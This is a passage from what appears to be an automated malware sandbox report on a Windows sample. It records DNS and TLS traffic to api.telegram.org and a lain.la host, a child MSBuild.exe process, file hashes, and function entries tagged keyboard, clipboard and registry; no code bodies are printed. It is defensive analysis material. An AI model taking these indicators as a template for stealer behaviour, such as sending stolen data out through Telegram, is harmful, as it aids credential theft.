Aug 31, 2021 19:41:42.391702890 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391731024 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391737938 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391771078 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391846895 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391884089 CEST | 49727 | 443 | 192.168.2.5 | 149.154.167.220 |
Aug 31, 2021 19:41:42.391932011 CEST | 49727 | 443 | 192.168.2.5 | 149.154.167.220 |
Aug 31, 2021 19:41:42.391933918 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.391947031 CEST | 49727 | 443 | 192.168.2.5 | 149.154.167.220 |
Aug 31, 2021 19:41:42.391990900 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418446064 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418473005 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418492079 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418509960 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418524027 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418595076 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418611050 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.418658018 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.425363064 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.954807997 CEST | 443 | 49727 | 149.154.167.220 | 192.168.2.5 |
Aug 31, 2021 19:41:42.999202013 CEST | 49727 | 443 | 192.168.2.5 | 149.154.167.220 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 31, 2021 19:39:31.496794939 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:39:31.534276009 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:39:37.835170984 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:39:37.869096041 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:39:44.421587944 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:39:44.463154078 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:02.508894920 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:02.557742119 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:21.532567024 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:21.577791929 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:23.641098022 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:23.682022095 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:25.622955084 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:25.655487061 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:29.174525023 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:29.210944891 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:40:33.150593042 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:40:33.194775105 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:03.647032976 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:03.682113886 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:06.020236969 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:06.056927919 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:21.736905098 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:21.763030052 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:24.208148956 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:24.233335018 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:24.335397959 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:24.360485077 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
Aug 31, 2021 19:41:42.197696924 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
Aug 31, 2021 19:41:42.222775936 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Aug 31, 2021 19:39:37.835170984 CEST | 192.168.2.5 | 8.8.8.8 | 0xa83a | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 31, 2021 19:41:21.736905098 CEST | 192.168.2.5 | 8.8.8.8 | 0x8918 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 31, 2021 19:41:24.208148956 CEST | 192.168.2.5 | 8.8.8.8 | 0xd59d | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 31, 2021 19:41:24.335397959 CEST | 192.168.2.5 | 8.8.8.8 | 0x2971 | Standard query (0) | A (IP address) | IN (0x0001) | |
Aug 31, 2021 19:41:42.197696924 CEST | 192.168.2.5 | 8.8.8.8 | 0x138c | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Aug 31, 2021 19:39:37.869096041 CEST | 8.8.8.8 | 192.168.2.5 | 0xa83a | No error (0) | 198.244.149.184 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:39:37.869096041 CEST | 8.8.8.8 | 192.168.2.5 | 0xa83a | No error (0) | 107.191.99.49 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:39:37.869096041 CEST | 8.8.8.8 | 192.168.2.5 | 0xa83a | No error (0) | 167.114.3.98 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:41:21.763030052 CEST | 8.8.8.8 | 192.168.2.5 | 0x8918 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:41:24.233335018 CEST | 8.8.8.8 | 192.168.2.5 | 0xd59d | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:41:24.360485077 CEST | 8.8.8.8 | 192.168.2.5 | 0x2971 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | ||
Aug 31, 2021 19:41:42.222775936 CEST | 8.8.8.8 | 192.168.2.5 | 0x138c | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Aug 31, 2021 19:39:37.985586882 CEST | 198.244.149.184 | 443 | 192.168.2.5 | 49706 | CN=*.lain.la CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Thu Jul 01 22:08:15 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021 | Wed Sep 29 22:08:14 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN=R3, O=Let's Encrypt, C=US | CN=ISRG Root X1, O=Internet Security Research Group, C=US | Fri Sep 04 02:00:00 CEST 2020 | Mon Sep 15 18:00:00 CEST 2025 | |||||||
CN=ISRG Root X1, O=Internet Security Research Group, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Jan 20 20:14:03 CET 2021 | Mon Sep 30 20:14:03 CEST 2024 | |||||||
Aug 31, 2021 19:41:22.007800102 CEST | 149.154.167.220 | 443 | 192.168.2.5 | 49724 | CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004 | Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | |||||||
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | |||||||
Aug 31, 2021 19:41:24.302069902 CEST | 149.154.167.220 | 443 | 192.168.2.5 | 49725 | CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004 | Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | |||||||
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | |||||||
Aug 31, 2021 19:41:24.418850899 CEST | 149.154.167.220 | 443 | 192.168.2.5 | 49726 | CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004 | Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | |||||||
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 | |||||||
Aug 31, 2021 19:41:42.279213905 CEST | 149.154.167.220 | 443 | 192.168.2.5 | 49727 | CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004 | Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e |
CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Tue May 03 09:00:00 CEST 2011 | Sat May 03 09:00:00 CEST 2031 | |||||||
CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Wed Jan 01 08:00:00 CET 2014 | Fri May 30 09:00:00 CEST 2031 | |||||||
OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US | Tue Jun 29 19:06:20 CEST 2004 | Thu Jun 29 19:06:20 CEST 2034 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 19:39:36 |
Start date: | 31/08/2021 |
Path: | C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.17994.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 421376 bytes |
MD5 hash: | 074864AED555C328431042197F317B23 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:39:38 |
Start date: | 31/08/2021 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x850000 |
File size: | 261728 bytes |
MD5 hash: | D621FD77BD585874F9686D3A76462EF1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Executed Functions |
---|
Function 0040374E, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004029C2, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 01C70095, Relevance: 13.8, APIs: 9, Instructions: 299filememorylibraryCOMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041E47B, Relevance: 10.7, APIs: 7, Instructions: 175COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040E1F0, Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00436A28, Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 004030A5, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00402F58, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05160F91, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 591processthreadCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0044CC82, Relevance: 9.2, APIs: 6, Instructions: 154COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041C955, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0044C0D1, Relevance: 4.5, APIs: 3, Instructions: 32COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0044C450, Relevance: 4.5, APIs: 3, Instructions: 22COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00403682, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0042F782, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040318A, Relevance: 3.0, APIs: 2, Instructions: 38COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00424274, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 05160AB5, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
APIs |
|
Memory Dump Source |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040B6D0, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00403E39, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00424129, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Function 0046F5D0, Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMONCrypto
C-Code - Quality: 85% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046A8DC, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041F78E, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0040BDF0, Relevance: 39.1, APIs: 12, Strings: 10, Instructions: 643COMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046F122, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0042BDF6, Relevance: 21.5, APIs: 14, Instructions: 537COMMON
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046ECBC, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00405D32, Relevance: 17.1, Strings: 13, Instructions: 810COMMON
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00408530, Relevance: 11.0, APIs: 7, Instructions: 531COMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046EAA6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00403EC5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046FF04, Relevance: 6.1, APIs: 4, Instructions: 53nativeCOMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0043BE31, Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041DD92, Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0041AFB4, Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0046F45A, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0044D712, Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
APIs |
